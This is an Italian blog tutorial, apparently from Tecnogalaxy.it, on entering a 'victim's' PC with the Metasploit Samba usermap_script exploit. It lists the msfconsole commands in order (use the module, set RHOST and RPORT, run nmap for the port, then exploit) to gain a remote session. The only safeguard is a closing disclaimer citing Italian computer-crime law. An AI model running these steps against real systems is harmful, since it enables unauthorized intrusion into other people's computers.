Oggi parleremo di come entrare in un PC con exploit samba, una delle tecniche più conosciute per accedere a sistemi remoti; il principio di funzionamento è simile a molti procedimenti che abbiamo analizzato in precedenza; ci basterà conoscere l’IP della vittima e quindi la sua porta remota e il gioco è fatto. Use exploit/multi/samba/usermap_script fa parte di una gamma di attacchi che ci offre la console di Metasploit Framework, uno dei programmi alla base di Kali Linux.

Entrare in un PC con Exploit Samba

L’attacco di cui stiamo parlando andrà a buon fine se msfconsole riuscirà a individuare nella macchina remota una falla di sistema, dalla quale sarà facile evadere le misure di sicurezza e creare un ponte di comunicazione nascosto con il nostro computer. Ma senza giri di parole incominciamo subito ad entrare nella parte pratica dell’attacco.

Come primo procedimento dovrete aprire un nuovo terminale e digitare il comando “msfconsole”, in modo tale da richiamare la console di Metasploit;

Entrare in un PC con exploit samba

una volta fatto ciò possiamo cominciare a digitare ordinatamente questa serie di comandi:

-use exploit/multi/samba/usermap_script

Entrare in un PC con exploit samba

-set RHOST indirizzo ip remoto

Entrare in un PC con exploit samba

-set RPORT porta remota

Entrare in un PC con exploit samba

 

N.B ricordo che la porta remota possiamo ottenerla semplicemente digitando su un nuovo terminale il comando:

nmap “indirizzo IP vittima”

-exploit

Entrare in un PC con exploit samba

 

Nel caso in cui siete riusciti ad accedere nel pc della vittima potete avere un quadro completo di comandi semplicemente digitando il comando help sullo stesso terminale.

Ricordo che questo articolo è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Tutto lo staff di Tecnogalaxy.it non si assume la responsabilità per eventuali usi scorretti che ne farete. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera, sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella dati, informazioni o programmi informatici (art. 635 bis c.p.).

Leggi anche il nostro articolo Hackerare un dispositivo con PHP injection.